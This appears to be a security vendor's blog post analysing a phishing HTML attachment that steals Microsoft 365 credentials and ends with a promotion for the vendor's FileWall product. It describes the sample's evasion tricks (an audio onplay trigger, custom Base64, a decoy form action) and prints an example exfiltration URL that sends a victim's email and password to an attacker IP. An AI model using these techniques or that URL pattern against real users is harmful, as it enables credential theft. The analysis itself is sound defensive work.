On March 24 the odix team found a new malware which possess a unique threat to end users. The malware, which was discovered and sanitized by FileWall, hacks into the user’s Microsoft 365 credentials and then post the compromised data to an RSS feed. To add insult to injury, the RSS feed platform also appears to be the work of malicious actors.
The page loader looks identical to the loading page for outlook:
The HTML document has a small body that contains a JavaScript variable called nextHmtl (not a typo) which has 206912 characters.
The document also contains an audio element:
After the page is loaded the source of the audio component is set to:
”http://cache[.waptrick[.]one/ringtones_new/fullmp3high/Ariana_Grande_Positions.mp3″ /]
For better or worse (depending on your musical preferences) the song is not played (If you want to listen to the original song, you can hear it here) The attacker uses the onplay event that is triggered when the audio element is played to trigger the decoding of the actual phishing page.
Why use the onplay event? To avoid detection!
If the code is running in an offline environment, which are common in dynamic analysis the event won’t be triggered and the malicious code will remain dormant.
The attacker implemented their own version of Base64 encoding instead of using the native JavaScript atob function (most likely to avoid detection). The attacker’s version of base64 is a bit different then the standard base 64. For example, “odix” encoded to base64 is: “b2RpeAo=” in the attackers’ version if we encode “odix” we get: “b2RpeA==” (without the lower-case o). Our team believes this was done to evade detection by analysis tools that can spot base64 encoded data, decode and analyze it.
The attacker uses the decoder to decode the contents of the nextHmtl parameter and creates a URL for it using the URL.createObjectURL function. The user is forwarded to the generated page with their email address as a parameter.
Secondary page
The decoded JavaScript variable opens as a second page. This is the actual phishing page:
The page uses the data-bind property in many of the tags. It seems to have code that is intended to be used with the Knockout JavaScript library, but the library itself isn’t loaded.
Attacker loads multiple images directly from Microsoft, some sample URLs:
https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_white_0ad43084800fd8b50a2576b5173746fe.png
https://logincdn.msauth.net/shared/1.0/content/images/ellipsis_635a63d500a92a0b8497cdc58d0f66b1.svg
https://logincdn.msauth.net/shared/1.0/content/images/ellipsis_635a63d500a92a0b8497cdc58d0f66b1.svg
https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_grey_5bc252567ef56db648207d9c36a9d004.png
https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg
https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg
https://outlook-1.cdn.office.net/assets/mail/pwa/v1/pngs/apple-touch-icon.png
The attackers use a decoy URL in the form.
While the form action is set to “https://getcontact[.]com/php” the actual submit event is overridden, and data is not sent to it.
Where is the data sent to?
The HTML form that the user fills data in seems to send the data to https://getcontact[.]com/php:
But further analysis showed that the form isn’t submitted. A different function is executed when the victim clicks the submit button.
The user credentials are sent to an RSS creation API at https://rss[.]app
Rss.app is a website that allows to create custom RSS feeds from websites. The RSS feed created by the attacker, assuming the victim email is: “victim@constoso.com” and password is: “1234”, is generated from the URL:
http://3[.]140[.]137[.]39/rss.php?u=victim@contoso.com&k=1234
When checking the rss.app website, it seems a bit odd…
There was no company info except for a contact email “help@rss.app”. Website whois information is hidden, not uncommon but you wouldn’t expect a web company to not provide any information.
During our investigation we encountered some code at pastebin which contains similar code to the code in the sample. Data was pasted In July 2019:
This new malware was blocked by FileWall
FileWall™ by odix offers an effective plugin based on its patented algorithm for eliminating malware hidden in files. Instead of trying to detect a known malware and block the file for the user, the FileWall™ service disarms malware and provides a sanitized file for safe usage. FileWall™ provides an effective malware prevention solution against both known and unknown malware attacks and handles all incoming email traffic including internal emails.
The FileWall™ advanced attachment security add-on for Microsoft 365 mail includes:
- Seamless deployment- one-click service activation
- Advanced email attachments handling for both internal and external senders.
- FileWall™ doesn’t harm/change any of Microsoft sender related security capabilities
- Deep file analysis capabilities (archive, password-protected, etc).
To read more Malware finds from the odix team visit https://www.odi-x.com/news/